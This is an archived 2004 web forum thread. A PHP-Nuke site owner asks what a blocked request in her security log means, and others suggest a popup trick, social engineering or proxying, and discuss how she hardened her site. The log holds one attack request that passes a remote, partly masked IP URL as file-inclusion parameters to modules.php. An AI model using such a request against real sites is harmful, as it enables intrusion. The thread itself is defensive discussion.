homepage Welcome to WebmasterWorld Guest from 54.211.235.255
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Visit PubCon.com
Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
Forum Library, Charter, Moderators: phranque

Website Technology Issues Forum

    
Hack Attempt
Some sort of PHP Script to Hack my site?
neweb




msg:665619
 10:04 am on Jul 8, 2004 (gmt 0)

HI,

I've been receiving several notifications like the following ... with [217.XX.104.226...] in the url ... and just am curious if anyone knows what they are attempting to do?

Date & Time: 2004-07-08 02:30:56
Blocked IP: unknown...
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/1.2.1.1
Query String: newbiehangout.com/modules.php?name=http://217.XX.104.226/&file=http://217.XX.104.226/&func=http://217.XX.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.2XX.221.7
Remote Port: 57529
Request Method: GET
--------------------
Who-Is for IP
OrgName: Unknown Works
OrgID: UNKNOW
Address: 3928 SE Tolman st
City: Portland
StateProv: OR
PostalCode: 97202
Country: US

NetRange: 63.2XX.164.144 - 63.2XX.164.151
CIDR: 63.2XX.164.144/29
NetName: UNKNOWNWORKS
NetHandle: NET-63-2XX-164-144-1
Parent: NET-63-2XX-0-0-1
NetType: Reassigned
Comment:
RegDate: 2000-11-16
Updated: 2000-11-16

TechHandle: IO-ORG-ARIN
TechName: Internet Operations, XXYY
TechPhone: +1-800-672-8520
TechEmail: dns-info@XXYY.net

Thank you!

[edited by: DaveAtIFG at 7:37 pm (utc) on July 8, 2004]
[edit reason] No specifics please [/edit]

 

JasonD




msg:665620
 2:53 pm on Jul 8, 2004 (gmt 0)

Mods and/or admins.

Please delete the above post or at least edit the URLs in there. Whatever any of you do don't enter any of the URLs

neweb




msg:665621
 10:58 pm on Jul 8, 2004 (gmt 0)

Oh,

I'm terribly sorry.

Thanks for editing it.

Does anyone have any ideas on this though?

Thanks.

JasonD




msg:665622
 12:17 am on Jul 9, 2004 (gmt 0)

No problem pal.

Let's just say it's been years since I got caught out with techniques like that and it definately "woke me up"

The URL that was in the original post led my browser to open multiple non stop self replicating popups with huge binary sound files.

It's a play on the old trick of doing the same but with telnet windows to consume CPU resource leading to a crash. If my memory serves me correctly it was part of the first .hta virii generator called God Message (or something similar)

Anyway...... as to the cause of why you are getting these messages. Where are you receiving them from?

A software firewall like Zone Alarm etc or in your server logs?

neweb




msg:665623
 3:08 am on Jul 9, 2004 (gmt 0)

Hi Jason,

Thanks for letting me know.

I've been plagued with hack attempts ever since I opened up my PHP Nuke area. I was successfully hacked two times (2 days in a row) a few months ago and then I put in some major security features ... one of which is called "Sentinel" and that is the program that is sending me the alerts letting me know that someone was banned on my site.

Usually the hack alert notifications are pretty straightforward and I can easily see what they were attempting ... usually it's some sort of sql injection method or a play on the url trying to add an admin account or something. And now Sentinel is beefed up to even ban Agents or "web site grabbers".

But I just didn't understand the point of this one or what they were trying to accomplish with this. I've received tons of them in the last couple of days.

Seems kind of weird that they would be doing that to themselves ;o)

Anyway, thanks for your help and again ... sorry ... wasn't thinking when I posted that.

Take care!

Darla

JasonD




msg:665624
 9:11 am on Jul 9, 2004 (gmt 0)

It sounds as if it could be aimed at you.

Just by posting the URL to your server you are getting the alerts. If they realise this then in all honesty you (and I) are going to check it out leading to the desired result.

Or.... if newbiehangout is your site they could well be using it to mask attempts on others as it appears from that the format of the URL that it is proxying the request.

Good old fashioned social engineering technique.

neweb




msg:665625
 3:01 am on Jul 10, 2004 (gmt 0)

Hi Again,

Yep, that's my url .... but I quit checking the attempted hacks a long time ago. They were hitting my site left and right. I've come to believe in "security through obscurity" LOL

My site was fine until I developed a couple modules for PHP Nuke ... and then the script kiddies found me and had a heyday until I installed all the security features. I still haven't added the content back to the Nuke Portal area ... I got a little nervous about re-adding it again after the first hacks. But, there hasn't been any successful hacks in about 3 months now ... so I guess I just need to get over it and move on ;o) It was a good learning experience for me though. Prior to that, I knew nothing about security and I ended up paying a price for that.

It's actually almost funny now ... but then it's also terribly sad that they don't have anything better to do than to mess with other people's sites like that. And they can't even claim it's for a "cause" or anything ;) It's just malicious. And I don't even think that they really "know" what they're doing. Most of the attempts come in floods ... like after a new vulnerability is posted ...

It's like they wait for someone else to post a code and then they just copy and paste it to see if it works ;o)

Awww, well ... live and learn.

You've been a pleasure to talk to and I appreciate your help.

Take care.

Darla

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Hardware and OS Related Technologies / Website Technology Issues
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved